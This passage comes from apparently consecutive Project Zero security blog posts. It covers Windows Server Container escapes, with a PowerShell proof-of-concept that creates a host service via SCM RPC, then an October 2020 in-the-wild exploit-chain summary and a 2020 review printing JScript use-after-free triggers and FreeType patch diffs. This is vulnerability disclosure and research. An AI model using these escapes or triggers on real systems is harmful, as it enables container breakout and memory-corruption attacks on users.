  }

  return ObpRootDirectoryObject;

}

We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();

Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {

  PETHREAD Thread = PsGetCurrentThread();

  PEJOB silo = Thread->Silo;

  if (silo == (PEJOB)-3) {

    silo = Thread->Tcb.Process->Job;

    while(silo) {

      if (silo->JobFlags & EJOB_SILO) {

        break;

      }

      silo = silo->ParentJob;

    }

  }

  return silo;

}

A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"

PS> $root.FullPath

\

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> $root.FullPath

\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()

PS> $sym_path = "$env:SystemDrive\symbols"

PS> mkdir $sym_path | Out-Null

PS> $services_path = "$env:SystemRoot\system32\services.exe"

PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'

# You can also use the following to run a container based executable.

#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {

#   "\\.\GLOBALROOT" + $f.FullPath

#}

PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path

PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | 

   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'

PS> $client = Get-RpcClient $rpc

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> Connect-RpcClient $client -EndpointPath ntsvcs

PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `

 [NullString]::Value, `

 [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)

PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `

 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `

 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)

PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

In-the-Wild Series: October 2020 0-day discovery

Posted by Maddie Stone, Project Zero

In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via "watering hole" attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices. These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.

In this post we are summarizing the exploit chains we discovered in October 2020. We have already published the details of the seven 0-day vulnerabilities exploited in our root cause analysis (RCA) posts. This post aims to provide the context around these exploits.

What happened

In October 2020, we discovered that the actor from the February 2020 campaign came back with the next iteration of their campaign: a couple dozen websites redirecting to an exploit server. Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. 

In our testing, both of the exploit servers existed on all of the discovered domains. A summary of the two exploit servers is below:

Exploit server #1:

  • Initially responded to only iOS and Windows user-agents
  • Remained up and active for over a week from when we first started pulling exploits
  • Replaced the Chrome renderer RCE with a new v8 0-day (CVE-2020-16009) after the initial one (CVE-2020-15999) was patched
  • Briefly responded to Android user-agents after exploit server #2 went down (though we were only able to get the new Chrome renderer RCE)

Exploit server #2:

  • Responded to Android user-agents
  • Remained up and active for ~36 hours from when we first started pulling exploits
  • In our experience, responded to a much smaller block of IP addresses than exploit server #1

The diagram above shows the flow of a device connecting to one of the affected websites. The device is directed to either exploit server #1 or exploit server #2. The following exploits are then delivered based on the device and browser.

Exploit Server

Platform

Browser

Renderer RCE

Sandbox Escape

Local Privilege Escalation

1

iOS

Safari

Stack R/W via Type 1 Fonts (CVE-2020-27930)

Not needed

Info leak via mach message trailers (CVE-2020-27950)

Type confusion with turnstiles (CVE-2020-27932)

1

Windows

Chrome

Freetype heap buffer overflow

(CVE-2020-15999)

Not needed

cng.sys heap buffer overflow (CVE-2020-17087)

1

Android

** Note: This was only delivered after #2 went down and CVE-2020-15999 was patched.

Chrome

V8 type confusion in TurboFan (CVE-2020-16009)

Unknown

Unknown

2

Android

Chrome

Freetype heap buffer overflow

(CVE-2020-15999)

Chrome for Android head buffer overflow (CVE-2020-16010)

Unknown

2

Android

Samsung Browser

Freetype heap buffer overflow

(CVE-2020-15999)

Chromium n-day

Unknown

All of the platforms employed obfuscation and anti-analysis checks, but each platform's obfuscation was different. For example, iOS is the only platform whose exploits were encrypted with ephemeral keys, meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly.

These operational exploits also lead us to believe that while the entities between exploit servers #1 and #2 are different, they are likely working in a coordinated fashion. Both exploit servers used the Chrome Freetype RCE (CVE-2020-15999) as the renderer exploit for Windows (exploit server #1) and Android (exploit server #2), but the code that surrounded these exploits was quite different. The fact that the two servers went down at different times also lends us to believe that there were two distinct operators.

The exploits

In total, we collected:

  • 1 full chain targeting fully patched Windows 10 using Google Chrome
  • 2 partial chains targeting 2 different fully patched Android devices running Android 10 using Google Chrome and Samsung Browser, and
  • RCE exploits for iOS 11-13 and privilege escalation exploit for iOS 13 (though the vulnerabilities were present up to iOS 14.1)

*Note: iOS, Android, and Windows were the only devices we tested while the servers were still active. The lack of other exploit chains does not mean that those chains did not exist.

The seven 0-days exploited by this attacker are listed below. We’ve provided the technical details of each of the vulnerabilities and their exploits in the root cause analyses.

We were not able to collect any Android local privilege escalations prior to exploit server #2 being taken down. Exploit server #1 stayed up longer, and we were able to retrieve the privilege escalation exploits for iOS.

The vulnerabilities cover a fairly broad spectrum of issues - from a modern JIT vulnerability to a large cache of font bugs. Overall each of the exploits themselves showed an expert understanding of exploit development and the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero. The process to figure out how to trigger the iOS kernel privilege vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out.

Conclusion

Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year. We are so thankful to all of the vendors and defensive response teams who worked their own long days to analyze our reports and get patches released and applied.

Déjà vu-lnerability

A Year in Review of 0-days Exploited In-The-Wild in 2020

Posted by Maddie Stone, Project Zero

2020 was a year full of 0-day exploits. Many of the Internet’s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches — patches that don’t correctly and comprehensively fix the root cause of a vulnerability — allow attackers to use 0-days against users with less effort.

Since mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero’s mission has been to “make 0-day hard”. From that came the goal of our in-the-wild program: “Learn from 0-days exploited in-the-wild in order to make 0-day hard.” In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public’s understanding of 0-day exploitation is only helpful when it doesn’t diverge from the “private state-of-the-art”, what attackers are doing and are capable of.

Over the last 18 months, we’ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. For the 2nd year in a row, we’re publishing a “Year in Review” report of the previous year’s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in each individual exploit’s analysis, please check out our root cause analyses.

When looking at the 24 0-days detected in-the-wild in 2020, there’s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days. 

A correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we’re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.

While the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.

This vulnerability looks familiar 🤔

As stated in the introduction, 2020 included 0-day exploits that are similar to ones we’ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We’re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it’s much easier to then exploit another.

Product

Vulnerability exploited in-the-wild

Variant of...

Microsoft Internet Explorer

CVE-2020-0674

CVE-2018-8653* CVE-2019-1367* CVE-2019-1429*

Mozilla Firefox

CVE-2020-6820

Mozilla Bug 1507180

Google Chrome

CVE-2020-6572

CVE-2019-5870

CVE-2019-13695

Microsoft Windows

CVE-2020-0986

CVE-2019-0880*

Google Chrome/Freetype

CVE-2020-15999

CVE-2014-9665

Apple Safari

CVE-2020-27930

CVE-2015-0093

* vulnerability was also exploited in-the-wild in previous years

 

Internet Explorer JScript CVE-2020-0674

CVE-2020-0674 is the fourth vulnerability that’s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the 2019 year-in-review we devoted a section to these vulnerabilities. Google’s Threat Analysis Group attributed all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.

JScript is the legacy Javascript engine in Internet Explorer. While it’s legacy, by default it is still enabled in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I’ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.

CVE-2018-8653

In December 2018, it was discovered that CVE-2018-8653 was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a write-up going through each step of this exploit.

var objs = new Array();

var refs = new Array();

var dummyObj = new Object();

function getFreeRef()

{

  // 5. delete prototype objects as well as ordinary objects

  for ( var i = 0; i < 10000; i++ ) {

    objs[i] = 1;

  }

  CollectGarbage();

  for ( var i = 0; i < 200; i++ )

  {

    refs[i].prototype = 1;

  }

  // 6. Garbage collector frees unused variable blocks.

  // This includes the one holding the "this" variable

  CollectGarbage();

  // 7. Boom

  alert(this);

}

// 1. create "special" objects for which isPrototypeOf can be invoked

for ( var i = 0; i < 200; i++ ) {

        var arr = new Array({ prototype: {} });

        var e = new Enumerator(arr);

        refs[i] = e.item();

}

// 2. create a bunch of ordinary objects

for ( var i = 0; i < 10000; i++ ) {

        objs[i] = new Object();

}

// 3. create objects to serve as prototypes and set up callbacks

for ( var i = 0; i < 200; i++ ) {

        refs[i].prototype = {};

        refs[i].prototype.isPrototypeOf = getFreeRef;

}

// 4. calls isPrototypeOf. This sets up refs[100].prototype as "this" variable

// During callback, the "this" variable won't be tracked by the Garbage collector

// use different index if this doesn't work

dummyObj instanceof refs[100];

CVE-2019-1367

In September 2019, CVE-2019-1367 was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JSCript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in the

    //    arguments array

    alert(arguments[0]);

}

// 1. Call sort with a custom callback

[1,2].sort(F);

CVE-2019-1429

The CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied!

In November 2019, Microsoft released another patch to address this gap. CVE-2019-1429 addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. The variant is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JSCript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in the

    //    arguments array

    alert(arguments[0]);

}

+  // 1. Cause toJSON callback to fire

+  var o = {toJSON:F}

+  JSON.stringify(o);

-  // 1. Call sort with a custom callback

-  [1,2].sort(F);

CVE-2020-0674

In January 2020, CVE-2020-0674 was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.

var spray = new Array();

+  function F(arg1, arg2) {

-  function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in one of the named arguments

    //    The named arguments aren't tracked by garbage collector

+    arg1 = spray[5000];

-    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JScript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in

    //   a named argument

+    alert(arg1);

-    alert(arguments[0]);

}

// 1. Call sort with a custom callback

[1,2].sort(F);

CVE-2020-0968

Unfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched CVE-2020-0968, another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the advisory).

var spray = new Array();

function f1() {

  alert('callback 1');

  return spray[6000];

}

function f2() {

  alert('callback 2');

  spray = null;

  CollectGarbage();

  return 'a'

}

function boom() {

  var e = o1;

  var d = o2;

  // 3. the first callback (e.toString) happens

  //    it returns one of the string variables

  //    which is stored in a temporary variable

  //    on the stack, not tracked by garbage collector

  // 4. Second callback (d.toString) happens

  //    There, string variables get freed

  //    and the space reclaimed

  // 5. Crash happens when attempting to access

  //    string content of the temporary variable

  var b = e + d;

  alert(b);

}

// 1. create two objects with toString callbacks

var o1 = { toString: f1 };

var o2 = { toString: f2 };

// 2. create a bunch of string variables

for (var a = 0; a < 20000; a++) {

  spray[a] = "aaa";

}

boom();

In addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of “plug and play” quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit.

Firefox CVE-2020-6820

Mozilla patched CVE-2020-6820 in Firefox with an out-of-band security update in April 2020. It is a use-after-free in the Cache subsystem.

CVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.

The execution patch for CVE-2020-6820 is:

StreamList::CloseAll  Patched function

  CacheStreamControlParent::CloseAll

    CacheStreamControlParent::NotifyCloseAll

      StreamControl::CloseAllReadStreams

        For each stream: 

          ReadStream::Inner::CloseStream

            ReadStream::Inner::Close

              ReadStream::Inner::NoteClosed

               

                StreamControl::NoteClosed

                  StreamControl::ForgetReadStream              

                    CacheStreamControlParent/Child::NoteClosedAfterForget

                      CacheStreamControlParent::RecvNoteClosed

                        StreamList::NoteClosed

                          If StreamList is empty && mStreamControl:

                           CacheStreamControlParent::Shutdown

                             Send__delete(this)  FREED HERE!

    PCacheStreamControlParent::SendCloseAll  Used here in call to Id()

CVE-2020-6820 is a variant of an internally found Mozilla vulnerability, Bug 1507180. 1507180 was discovered in November 2018 and patched in December 2019. 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, an explanatory comment for why the December 2019 patch was needed was added in early March 2020.

For 150718 the execution path was the same as for CVE-2020-6820 except that the the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls “higher” in StreamList::CloseAll. 

In my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [1, 2]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn’t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our in-the-wild tracking spreadsheet and thus included in this list.

Chrome for Android CVE-2020-6572

CVE-2020-6572 is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated.  

More specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder).

This vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle reported a very similar vulnerability, CVE-2019-13695. CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it’s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.

In addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The vulnerability is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is CVE-2019-5870. Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, “TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices”.

While one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This was noted in the issue tracker for CVE-2019-5870 and then brought up again after Man Yue Mo reported CVE-2019-13695.

Windows splwow64 CVE-2020-0986

CVE-2020-0986 is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and CVE-2019-0880, which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D.

From this great write-up from ByteRaptors on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:

void GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)

{

  ...

    if(*((BYTE*)(firstAddress + 0x4)) == 0x75){

      ULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));

      if(memcpyDestinationAddress != NULL){

        ULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));

        DWORD copySize = *((DWORD*)(firstAddress + 0x28));

        memcpy(memcpyDestinationAddress,sourceAddress,copySize);

      }

    }

...

}

The equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.

void GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)

{

  ...

    if(*((BYTE*)(msgSend + 0x4)) == 0x6D){

     ...

     ULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA)); 

     if(srcAddress != NULL){

        DWORD copySize = *((DWORD*)(msgSend + 0x40));

           if(copySize <= 0x1FFFE) {

                ULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));

                memcpy(destAddress,sourceAddress,copySize);

      }

    }

...

}

In addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the “Exploited 0-days not properly fixed” section below.

Freetype CVE-2020-15999

In October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, CVE-2020-15999. The vulnerability is a heap buffer overflow in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.

In November 2014, Project Zero team member Mateusz Jurczyk reported CVE-2014-9665 to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small.

To patch CVE-2014-9665, Freetype added a check to the rows and width prior to calculating the size as shown below.

if ( populate_map_and_metrics )

    {

      FT_Long  size;

      metrics->width  = (FT_Int)imgWidth;

      metrics->height = (FT_Int)imgHeight;

      map->width      = metrics->width;

      map->rows       = metrics->height;

      map->pixel_mode = FT_PIXEL_MODE_BGRA;

      map->pitch      = map->width * 4;

      map->num_grays  = 256;

+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }

      size = map->rows * map->pitch; <- overflow size

      error = ft_glyphslot_alloc_bitmap( slot, size );

      if ( error )

        goto DestroyExit;

    }

To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG.

     if ( populate_map_and_metrics )

     {

+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }

+

       metrics->width  = (FT_UShort)imgWidth;

       metrics->height = (FT_UShort)imgHeight;

       map->width      = metrics->width;

       map->rows       = metrics->height;

       map->pixel_mode = FT_PIXEL_MODE_BGRA;

       map->pitch      = map->width * 4;

       map->num_grays  = 256;

-      /* reject too large bitmaps similarly to the rasterizer */

-      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

-      {

-        error = FT_THROW( Array_Too_Large );

-        goto DestroyExit;

-      }

[...]

To summarize:

  • CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.
  • CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow.

Apple Safari CVE-2020-27930

This vulnerability is slightly different than the rest in that while it’s still a variant, it’s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

